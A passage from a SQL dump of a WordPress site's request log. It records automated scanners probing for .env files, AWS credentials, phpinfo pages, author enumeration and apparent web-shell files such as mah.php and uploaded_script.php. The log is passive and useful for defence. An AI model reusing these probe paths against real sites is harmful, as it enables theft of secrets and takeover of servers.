23:15:05','2025-11-03 23:15:05'),(3582,'https://amb18b.com/stg/.env.staging','3.68.72.118','Direct Access',1,'2025-11-03 23:15:06','2025-11-03 23:15:06'),(3583,'https://amb18b.com/shop/.env.local','3.68.72.118','Direct Access',1,'2025-11-03 23:15:07','2025-11-03 23:15:07'),(3584,'https://amb18b.com/public/.env.staging','3.68.72.118','Direct Access',1,'2025-11-03 23:15:08','2025-11-03 23:15:08'),(3585,'https://amb18b.com/nodeweb/.env','3.68.72.118','Direct Access',1,'2025-11-03 23:15:09','2025-11-03 23:15:09'),(3586,'https://amb18b.com/prod/.env.staging','3.68.72.118','Direct Access',1,'2025-11-03 23:15:10','2025-11-03 23:15:10'),(3587,'https://amb18b.com/.env.sample.php','3.68.72.118','Direct Access',1,'2025-11-03 23:15:11','2025-11-03 23:15:11'),(3588,'https://amb18b.com/api/.env','3.68.72.118','Direct Access',1,'2025-11-03 23:15:12','2025-11-03 23:15:12'),(3589,'https://amb18b.com/config/.env','3.68.72.118','Direct Access',1,'2025-11-03 23:15:13','2025-11-03 23:15:13'),(3590,'https://amb18b.com/frontend/.env.production','3.68.72.118','Direct Access',1,'2025-11-03 23:15:14','2025-11-03 23:15:14'),(3591,'https://amb18b.com/dashboard/.env','3.68.72.118','Direct Access',1,'2025-11-03 23:15:15','2025-11-03 23:15:15'),(3592,'https://amb18b.com/web/.env.production','3.68.72.118','Direct Access',1,'2025-11-03 23:15:16','2025-11-03 23:15:16'),(3593,'https://amb18b.com/client/.env.local','3.68.72.118','Direct Access',1,'2025-11-03 23:15:17','2025-11-03 23:15:17'),(3594,'https://amb18b.com/.env.save','3.68.72.118','Direct Access',1,'2025-11-03 23:15:18','2025-11-03 23:15:18'),(3595,'https://amb18b.com/development/.env','3.68.72.118','Direct Access',1,'2025-11-03 23:15:18','2025-11-03 23:15:18'),(3596,'https://amb18b.com/test/.env','3.68.72.118','Direct Access',1,'2025-11-03 23:15:19','2025-11-03 23:15:19'),(3597,'https://amb18b.com/portal/.env.production','3.68.72.118','Direct Access',1,'2025-11-03 23:15:21','2025-11-03 23:15:21'),(3598,'https://amb18b.com/application/.env','3.68.72.118','Direct Access',1,'2025-11-03 23:15:22','2025-11-03 23:15:22'),(3599,'https://amb18b.com/phpinfo.php','3.68.72.118','Direct Access',1,'2025-11-03 23:15:24','2025-11-03 23:15:24'),(3600,'https://amb18b.com/info.php','3.68.72.118','Direct Access',1,'2025-11-03 23:15:25','2025-11-03 23:15:25'),(3601,'https://amb18b.com/phpinfo','3.68.72.118','Direct Access',1,'2025-11-03 23:15:26','2025-11-03 23:15:26'),(3602,'https://amb18b.com/php_info.php','3.68.72.118','Direct Access',1,'2025-11-03 23:15:27','2025-11-03 23:15:27'),(3603,'https://amb18b.com/test.php','3.68.72.118','Direct Access',1,'2025-11-03 23:15:28','2025-11-03 23:15:28'),(3604,'https://amb18b.com/_profiler/phpinfo','3.68.72.118','Direct Access',1,'2025-11-03 23:15:29','2025-11-03 23:15:29'),(3605,'https://amb18b.com/.aws/credentials','3.68.72.118','Direct Access',1,'2025-11-03 23:15:30','2025-11-03 23:15:30'),(3606,'https://amb18b.com/.AWS_/credentials','3.68.72.118','Direct Access',1,'2025-11-03 23:15:31','2025-11-03 23:15:31'),(3607,'https://amb18b.com/karma.conf.json','3.68.72.118','Direct Access',1,'2025-11-03 23:15:32','2025-11-03 23:15:32'),(3608,'https://amb18b.com/.env','78.153.140.171','Direct Access',1,'2025-11-04 01:42:46','2025-11-04 01:42:46'),(3609,'https://amb18b.com/.env','78.153.140.171','Direct Access',1,'2025-11-04 01:42:47','2025-11-04 01:42:47'),(3610,'https://amb18b.com/sendgrid.env','78.153.140.171','Direct Access',1,'2025-11-04 01:42:50','2025-11-04 01:42:50'),(3611,'https://amb18b.com/twilio.env','78.153.140.171','Direct Access',1,'2025-11-04 01:42:52','2025-11-04 01:42:52'),(3612,'https://amb18b.com/api/.env','78.153.140.171','Direct Access',1,'2025-11-04 01:42:55','2025-11-04 01:42:55'),(3613,'https://amb18b.com/phpinfo/','78.153.140.171','Direct Access',1,'2025-11-04 01:42:57','2025-11-04 01:42:57'),(3614,'https://amb18b.com/dev/.env','78.153.140.171','Direct Access',1,'2025-11-04 01:42:58','2025-11-04 01:42:58'),(3615,'https://amb18b.com/app_dev.php/_profiler/phpinfo','78.153.140.171','Direct Access',1,'2025-11-04 01:43:00','2025-11-04 01:43:00'),(3616,'https://amb18b.com/admin/.env','78.153.140.171','Direct Access',1,'2025-11-04 01:43:01','2025-11-04 01:43:01'),(3617,'https://amb18b.com/laravel/.env','78.153.140.171','Direct Access',1,'2025-11-04 01:43:03','2025-11-04 01:43:03'),(3618,'https://amb18b.com/.config.yaml','78.153.140.171','Direct Access',1,'2025-11-04 01:43:04','2025-11-04 01:43:04'),(3619,'https://amb18b.com/sendgrid.env','78.153.140.171','Direct Access',1,'2025-11-04 01:43:06','2025-11-04 01:43:06'),(3620,'https://amb18b.com/backend/.env','78.153.140.171','Direct Access',1,'2025-11-04 01:43:06','2025-11-04 01:43:06'),(3621,'https://amb18b.com/secrets.env','78.153.140.171','Direct Access',1,'2025-11-04 01:43:07','2025-11-04 01:43:07'),(3622,'https://amb18b.com/twilio.env','78.153.140.171','Direct Access',1,'2025-11-04 01:43:08','2025-11-04 01:43:08'),(3623,'https://amb18b.com/api/.env','78.153.140.171','Direct Access',2,'2025-11-04 01:43:54','2025-11-04 01:43:10'),(3624,'https://amb18b.com/phpinfo/','78.153.140.171','Direct Access',1,'2025-11-04 01:43:13','2025-11-04 01:43:13'),(3625,'https://amb18b.com/dev/.env','78.153.140.171','Direct Access',1,'2025-11-04 01:43:15','2025-11-04 01:43:15'),(3626,'https://amb18b.com/app_dev.php/_profiler/phpinfo','78.153.140.171','Direct Access',1,'2025-11-04 01:43:17','2025-11-04 01:43:17'),(3627,'https://amb18b.com/admin/.env','78.153.140.171','Direct Access',1,'2025-11-04 01:43:20','2025-11-04 01:43:20'),(3628,'https://amb18b.com/laravel/.env','78.153.140.171','Direct Access',1,'2025-11-04 01:43:22','2025-11-04 01:43:22'),(3629,'https://amb18b.com/.config.yaml','78.153.140.171','Direct Access',1,'2025-11-04 01:43:24','2025-11-04 01:43:24'),(3630,'https://amb18b.com/backend/.env','78.153.140.171','Direct Access',1,'2025-11-04 01:43:26','2025-11-04 01:43:26'),(3631,'https://amb18b.com/secrets.env','78.153.140.171','Direct Access',1,'2025-11-04 01:43:27','2025-11-04 01:43:27'),(3632,'https://amb18b.com/.env.example','78.153.140.171','Direct Access',1,'2025-11-04 01:43:31','2025-11-04 01:43:31'),(3633,'https://amb18b.com/web/.env','78.153.140.171','Direct Access',1,'2025-11-04 01:43:34','2025-11-04 01:43:34'),(3634,'https://amb18b.com/.env.bak','78.153.140.171','Direct Access',1,'2025-11-04 01:43:37','2025-11-04 01:43:37'),(3635,'https://amb18b.com/staging/.env','78.153.140.171','Direct Access',1,'2025-11-04 01:43:38','2025-11-04 01:43:38'),(3636,'https://amb18b.com/debug/default/view?panel=config','78.153.140.171','Direct Access',1,'2025-11-04 01:43:41','2025-11-04 01:43:41'),(3637,'https://amb18b.com/core/.env','78.153.140.171','Direct Access',1,'2025-11-04 01:43:42','2025-11-04 01:43:42'),(3638,'https://amb18b.com/phpinfo.php','78.153.140.171','Direct Access',1,'2025-11-04 01:43:45','2025-11-04 01:43:45'),(3639,'https://amb18b.com/info/','78.153.140.171','Direct Access',1,'2025-11-04 01:43:47','2025-11-04 01:43:47'),(3640,'https://amb18b.com/images/.env','78.153.140.171','Direct Access',1,'2025-11-04 01:43:48','2025-11-04 01:43:48'),(3641,'https://amb18b.com/.env.save.1','78.153.140.171','Direct Access',1,'2025-11-04 01:43:51','2025-11-04 01:43:51'),(3642,'https://amb18b.com/.env.save','78.153.140.171','Direct Access',1,'2025-11-04 01:43:52','2025-11-04 01:43:52'),(3643,'https://amb18b.com/app/.env','78.153.140.171','Direct Access',1,'2025-11-04 01:43:56','2025-11-04 01:43:56'),(3644,'https://amb18b.com/test','78.153.140.171','Direct Access',1,'2025-11-04 01:43:58','2025-11-04 01:43:58'),(3645,'https://amb18b.com/core/.env','159.89.198.71','Direct Access',1,'2025-11-04 02:55:36','2025-11-04 02:55:36'),(3646,'https://amb18b.com/app/.env','159.89.198.71','Direct Access',1,'2025-11-04 02:55:36','2025-11-04 02:55:36'),(3647,'https://amb18b.com/api/.env','159.89.198.71','Direct Access',1,'2025-11-04 02:55:37','2025-11-04 02:55:37'),(3648,'https://amb18b.com/.env','159.89.198.71','Direct Access',1,'2025-11-04 02:55:37','2025-11-04 02:55:37'),(3649,'https://amb18b.com/.env.production','159.89.198.71','Direct Access',1,'2025-11-04 02:55:37','2025-11-04 02:55:37'),(3650,'https://amb18b.com/.env.save','159.89.198.71','Direct Access',1,'2025-11-04 02:55:38','2025-11-04 02:55:38'),(3651,'https://amb18b.com/public/.env','159.89.198.71','Direct Access',1,'2025-11-04 02:55:38','2025-11-04 02:55:38'),(3652,'https://amb18b.com/chosen.php','109.197.78.137','Direct Access',1,'2025-11-04 03:32:40','2025-11-04 03:32:40'),(3653,'https://amb18b.com/mah.php','109.197.78.137','Direct Access',1,'2025-11-04 03:32:40','2025-11-04 03:32:40'),(3654,'https://amb18b.com/goods.php','109.197.78.137','Direct Access',1,'2025-11-04 03:32:40','2025-11-04 03:32:40'),(3655,'https://amb18b.com/mah.php','194.34.96.101','Direct Access',1,'2025-11-04 03:39:12','2025-11-04 03:39:12'),(3656,'https://amb18b.com/chosen.php','194.34.96.101','Direct Access',1,'2025-11-04 03:39:12','2025-11-04 03:39:12'),(3657,'https://amb18b.com/goods.php','194.34.96.101','Direct Access',1,'2025-11-04 03:39:13','2025-11-04 03:39:13'),(3658,'https://amb18b.com/?author=2','161.118.166.167','Direct Access',1,'2025-11-04 06:10:40','2025-11-04 06:10:40'),(3659,'https://amb18b.com/?author=3','161.118.166.167','Direct Access',1,'2025-11-04 06:10:42','2025-11-04 06:10:42'),(3660,'https://amb18b.com/?author=4','161.118.166.167','Direct Access',1,'2025-11-04 06:10:43','2025-11-04 06:10:43'),(3661,'https://amb18b.com/?author=5','161.118.166.167','Direct Access',1,'2025-11-04 06:10:45','2025-11-04 06:10:45'),(3662,'https://amb18b.com/about.php?key=EnigmaCyberSecurity','196.251.66.105','Direct Access',1,'2025-11-04 06:12:14','2025-11-04 06:12:14'),(3663,'https://amb18b.com/uploaded_script.php','196.251.66.105','Direct Access',1,'2025-11-04 06:12:19','2025-11-04 06:12:19'),(3664,'https://amb18b.com/inputs.php','196.251.66.105','Direct Access',1,'2025-11-04 06:12:24','2025-11-04 06:12:24'),(3665,'https://amb18b.com/autoload_classmap.php','196.251.66.105','Direct Access',1,'2025-11-04 06:12:40','2025-11-04 06:12:40'),(3666,'https://amb18b.com/worksec.php','196.251.66.105','Direct Access',1,'2025-11-04 06:12:57','2025-11-04 06:12:57'),(3667,'https://amb18b.com/wp-admin/css/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:13:37','2025-11-04 06:13:37'),(3668,'https://amb18b.com/wp-admin/images/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:13:40','2025-11-04 06:13:40'),(3669,'https://amb18b.com/wp-admin/includes/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:13:45','2025-11-04 06:13:45'),(3670,'https://amb18b.com/wp-admin/js/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:14:04','2025-11-04 06:14:04'),(3671,'https://amb18b.com/wp-admin/maint/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:14:08','2025-11-04 06:14:08'),(3672,'https://amb18b.com/wp-includes/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:14:20','2025-11-04 06:14:20'),(3673,'https://amb18b.com/wp-includes/html-api/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:14:23','2025-11-04 06:14:23'),(3674,'https://amb18b.com/wp-includes/ID3/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:14:28','2025-11-04 06:14:28'),(3675,'https://amb18b.com/wp-includes/IXR/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:14:34','2025-11-04 06:14:34'),(3676,'https://amb18b.com/wp-includes/PHPMailer/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:14:39','2025-11-04 06:14:39'),(3677,'https://amb18b.com/wp-includes/Requests/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:14:43','2025-11-04 06:14:43'),(3678,'https://amb18b.com/wp-includes/Requests/Auth/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:14:49','2025-11-04 06:14:49'),(3679,'https://amb18b.com/wp-includes/Requests/Cookie/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:14:54','2025-11-04 06:14:54'),(3680,'https://amb18b.com/wp-includes/Requests/Exception/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:14:57','2025-11-04 06:14:57'),(3681,'https://amb18b.com/wp-includes/Requests/Exception/HTTP/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:15:03','2025-11-04 06:15:03'),(3682,'https://amb18b.com/wp-includes/Requests/Exception/Transport/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:15:09','2025-11-04 06:15:09'),(3683,'https://amb18b.com/wp-includes/Requests/Proxy/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:15:18','2025-11-04 06:15:18'),(3684,'https://amb18b.com/wp-includes/Requests/Response/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:15:23','2025-11-04 06:15:23'),(3685,'https://amb18b.com/wp-includes/Requests/Transport/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:15:27','2025-11-04 06:15:27'),(3686,'https://amb18b.com/wp-includes/Requests/Utility/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:15:32','2025-11-04 06:15:32'),(3687,'https://amb18b.com/wp-includes/SimplePie/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:15:37','2025-11-04 06:15:37'),(3688,'https://amb18b.com/wp-includes/SimplePie/Cache/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:15:41','2025-11-04 06:15:41'),(3689,'https://amb18b.com/wp-includes/SimplePie/Content/Type/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:15:45','2025-11-04 06:15:45'),(3690,'https://amb18b.com/wp-includes/SimplePie/Decode/HTML/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:15:51','2025-11-04 06:15:51'),(3691,'https://amb18b.com/wp-includes/SimplePie/HTTP/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:15:54','2025-11-04 06:15:54'),(3692,'https://amb18b.com/wp-includes/SimplePie/Net/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:15:58','2025-11-04 06:15:58'),(3693,'https://amb18b.com/wp-includes/SimplePie/Parse/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:16:03','2025-11-04 06:16:03'),(3694,'https://amb18b.com/wp-includes/SimplePie/XML/Declaration/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:16:09','2025-11-04 06:16:09'),(3695,'https://amb18b.com/wp-includes/Text/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:16:13','2025-11-04 06:16:13'),(3696,'https://amb18b.com/wp-includes/Text/Diff/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:16:18','2025-11-04 06:16:18'),(3697,'https://amb18b.com/wp-includes/Text/Diff/Engine/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:16:23','2025-11-04 06:16:23'),(3698,'https://amb18b.com/wp-includes/Text/Diff/Renderer/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:16:26','2025-11-04 06:16:26'),(3699,'https://amb18b.com/wp-includes/assets/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:16:34','2025-11-04 06:16:34'),(3700,'https://amb18b.com/wp-includes/block-patterns/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:16:38','2025-11-04 06:16:38'),(3701,'https://amb18b.com/wp-includes/block-supports/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:16:41','2025-11-04 06:16:41'),(3702,'https://amb18b.com/wp-includes/blocks/archives/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:16:51','2025-11-04 06:16:51'),(3703,'https://amb18b.com/wp-includes/blocks/audio/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:16:55','2025-11-04 06:16:55'),(3704,'https://amb18b.com/wp-includes/blocks/block/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:17:02','2025-11-04 06:17:02'),(3705,'https://amb18b.com/wp-includes/blocks/button/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:17:06','2025-11-04 06:17:06'),(3706,'https://amb18b.com/wp-includes/blocks/buttons/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:17:10','2025-11-04 06:17:10'),(3707,'https://amb18b.com/wp-includes/blocks/calendar/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:17:15','2025-11-04 06:17:15'),(3708,'https://amb18b.com/wp-includes/blocks/categories/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:17:19','2025-11-04 06:17:19'),(3709,'https://amb18b.com/wp-includes/blocks/code/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:17:24','2025-11-04 06:17:24'),(3710,'https://amb18b.com/wp-includes/blocks/column/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:17:29','2025-11-04 06:17:29'),(3711,'https://amb18b.com/wp-includes/blocks/columns/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:17:33','2025-11-04 06:17:33'),(3712,'https://amb18b.com/wp-includes/blocks/cover/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:17:37','2025-11-04 06:17:37'),(3713,'https://amb18b.com/wp-includes/blocks/embed/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:17:41','2025-11-04 06:17:41'),(3714,'https://amb18b.com/wp-includes/blocks/file/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:17:47','2025-11-04 06:17:47'),(3715,'https://amb18b.com/wp-includes/blocks/freeform/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:17:54','2025-11-04 06:17:54'),(3716,'https://amb18b.com/wp-includes/blocks/gallery/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:18:00','2025-11-04 06:18:00'),(3717,'https://amb18b.com/wp-includes/blocks/group/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:18:06','2025-11-04 06:18:06'),(3718,'https://amb18b.com/wp-includes/blocks/heading/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:18:12','2025-11-04 06:18:12'),(3719,'https://amb18b.com/wp-includes/blocks/html/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:18:20','2025-11-04 06:18:20'),(3720,'https://amb18b.com/wp-includes/blocks/image/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:18:24','2025-11-04 06:18:24'),(3721,'https://amb18b.com/wp-includes/blocks/latest-comments/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:18:30','2025-11-04 06:18:30'),(3722,'https://amb18b.com/wp-includes/blocks/latest-posts/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:18:34','2025-11-04 06:18:34'),(3723,'https://amb18b.com/wp-includes/blocks/legacy-widget/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:18:38','2025-11-04 06:18:38'),(3724,'https://amb18b.com/wp-includes/blocks/list/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:18:42','2025-11-04 06:18:42'),(3725,'https://amb18b.com/wp-includes/blocks/loginout/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:18:48','2025-11-04 06:18:48'),(3726,'https://amb18b.com/wp-includes/blocks/media-text/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:18:52','2025-11-04 06:18:52'),(3727,'https://amb18b.com/wp-includes/blocks/missing/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:18:55','2025-11-04 06:18:55'),(3728,'https://amb18b.com/wp-includes/blocks/more/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:18:59','2025-11-04 06:18:59'),(3729,'https://amb18b.com/wp-includes/blocks/nextpage/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:19:06','2025-11-04 06:19:06'),(3730,'https://amb18b.com/wp-includes/blocks/page-list/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:19:10','2025-11-04 06:19:10'),(3731,'https://amb18b.com/wp-includes/blocks/paragraph/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:19:16','2025-11-04 06:19:16'),(3732,'https://amb18b.com/wp-includes/blocks/post-content/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:19:20','2025-11-04 06:19:20'),(3733,'https://amb18b.com/wp-includes/blocks/post-date/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:19:24','2025-11-04 06:19:24'),(3734,'https://amb18b.com/wp-includes/blocks/post-excerpt/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:19:29','2025-11-04 06:19:29'),(3735,'https://amb18b.com/wp-includes/blocks/post-featured-image/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:19:33','2025-11-04 06:19:33'),(3736,'https://amb18b.com/wp-includes/blocks/post-template/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:19:37','2025-11-04 06:19:37'),(3737,'https://amb18b.com/wp-includes/blocks/post-terms/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:19:41','2025-11-04 06:19:41'),(3738,'https://amb18b.com/wp-includes/blocks/post-title/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:19:46','2025-11-04 06:19:46'),(3739,'https://amb18b.com/wp-includes/blocks/preformatted/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:19:50','2025-11-04 06:19:50'),(3740,'https://amb18b.com/wp-includes/blocks/pullquote/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:19:54','2025-11-04 06:19:54'),(3741,'https://amb18b.com/wp-includes/blocks/query-pagination-next/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:19:59','2025-11-04 06:19:59'),(3742,'https://amb18b.com/wp-includes/blocks/query-pagination-numbers/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:20:04','2025-11-04 06:20:04'),(3743,'https://amb18b.com/wp-includes/blocks/query-pagination-previous/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:20:09','2025-11-04 06:20:09'),(3744,'https://amb18b.com/wp-includes/blocks/query-pagination/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:20:12','2025-11-04 06:20:12'),(3745,'https://amb18b.com/wp-includes/blocks/query-title/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:20:16','2025-11-04 06:20:16'),(3746,'https://amb18b.com/wp-includes/blocks/query/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:20:21','2025-11-04 06:20:21'),(3747,'https://amb18b.com/wp-includes/blocks/quote/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:20:25','2025-11-04 06:20:25'),(3748,'https://amb18b.com/wp-includes/blocks/rss/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:20:28','2025-11-04 06:20:28'),(3749,'https://amb18b.com/wp-includes/blocks/search/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:20:35','2025-11-04 06:20:35'),(3750,'https://amb18b.com/wp-includes/blocks/separator/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:20:39','2025-11-04 06:20:39'),(3751,'https://amb18b.com/wp-includes/blocks/shortcode/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:20:44','2025-11-04 06:20:44'),(3752,'https://amb18b.com/wp-includes/blocks/site-logo/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:20:51','2025-11-04 06:20:51'),(3753,'https://amb18b.com/wp-includes/blocks/site-tagline/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:20:54','2025-11-04 06:20:54'),(3754,'https://amb18b.com/wp-includes/blocks/site-title/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:20:59','2025-11-04 06:20:59'),(3755,'https://amb18b.com/wp-includes/blocks/social-link/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:21:06','2025-11-04 06:21:06'),(3756,'https://amb18b.com/wp-includes/pomo/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:21:10','2025-11-04 06:21:10'),(3757,'https://amb18b.com/wp-includes/Requests/library/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:21:16','2025-11-04 06:21:16'),(3758,'https://amb18b.com/wp-includes/blocks/navigation-link/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:21:21','2025-11-04 06:21:21'),(3759,'https://amb18b.com/wp-includes/Requests/src/Exception/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:21:28','2025-11-04 06:21:28'),(3760,'https://amb18b.com/wp-includes/css/dist/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:21:31','2025-11-04 06:21:31'),(3761,'https://amb18b.com/wp-includes/blocks/comment-date/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:21:36','2025-11-04 06:21:36'),(3762,'https://amb18b.com/wp-includes/blocks/social-links/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:21:40','2025-11-04 06:21:40'),(3763,'https://amb18b.com/wp-includes/blocks/spacer/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:21:45','2025-11-04 06:21:45'),(3764,'https://amb18b.com/wp-includes/blocks/table/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:21:50','2025-11-04 06:21:50'),(3765,'https://amb18b.com/wp-includes/blocks/tag-cloud/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:21:54','2025-11-04 06:21:54'),(3766,'https://amb18b.com/wp-includes/blocks/text-columns/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:21:57','2025-11-04 06:21:57'),(3767,'https://amb18b.com/wp-includes/blocks/verse/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:22:03','2025-11-04 06:22:03'),(3768,'https://amb18b.com/wp-includes/blocks/video/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:22:08','2025-11-04 06:22:08'),(3769,'https://amb18b.com/wp-includes/certificates/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:22:15','2025-11-04 06:22:15'),(3770,'https://amb18b.com/wp-includes/css/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:22:20','2025-11-04 06:22:20'),(3771,'https://amb18b.com/wp-includes/css/dist/block-directory/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:22:26','2025-11-04 06:22:26'),(3772,'https://amb18b.com/wp-includes/css/dist/components/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:22:28','2025-11-04 06:22:28'),(3773,'https://amb18b.com/wp-includes/css/dist/customize-widgets/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:22:32','2025-11-04 06:22:32'),(3774,'https://amb18b.com/wp-includes/css/dist/list-reusable-blocks/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:22:37','2025-11-04 06:22:37'),(3775,'https://amb18b.com/wp-includes/css/dist/nux/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:22:41','2025-11-04 06:22:41'),(3776,'https://amb18b.com/wp-includes/css/dist/edit-post/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:22:46','2025-11-04 06:22:46'),(3777,'https://amb18b.com/wp-includes/css/dist/edit-widgets/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:22:49','2025-11-04 06:22:49'),(3778,'https://amb18b.com/wp-includes/css/dist/editor/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:22:53','2025-11-04 06:22:53'),(3779,'https://amb18b.com/wp-includes/css/dist/format-library/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:22:59','2025-11-04 06:22:59'),(3780,'https://amb18b.com/wp-includes/css/dist/reusable-blocks/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:23:03','2025-11-04 06:23:03'),(3781,'https://amb18b.com/wp-includes/css/dist/widgets/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:23:08','2025-11-04 06:23:08'),(3782,'https://amb18b.com/wp-includes/customize/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:23:12','2025-11-04 06:23:12'),(3783,'https://amb18b.com/wp-includes/fonts/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:23:18','2025-11-04 06:23:18'),(3784,'https://amb18b.com/wp-includes/images/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:23:22','2025-11-04 06:23:22'),(3785,'https://amb18b.com/wp-includes/images/crystal/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:23:26','2025-11-04 06:23:26'),(3786,'https://amb18b.com/wp-includes/images/media/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:23:39','2025-11-04 06:23:39'),(3787,'https://amb18b.com/wp-includes/images/smilies/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:23:44','2025-11-04 06:23:44'),(3788,'https://amb18b.com/wp-includes/images/wlw/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:23:48','2025-11-04 06:23:48'),(3789,'https://amb18b.com/wp-includes/js/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:23:51','2025-11-04 06:23:51'),(3790,'https://amb18b.com/wp-includes/js/codemirror/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:23:56','2025-11-04 06:23:56'),(3791,'https://amb18b.com/wp-includes/js/crop/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:24:01','2025-11-04 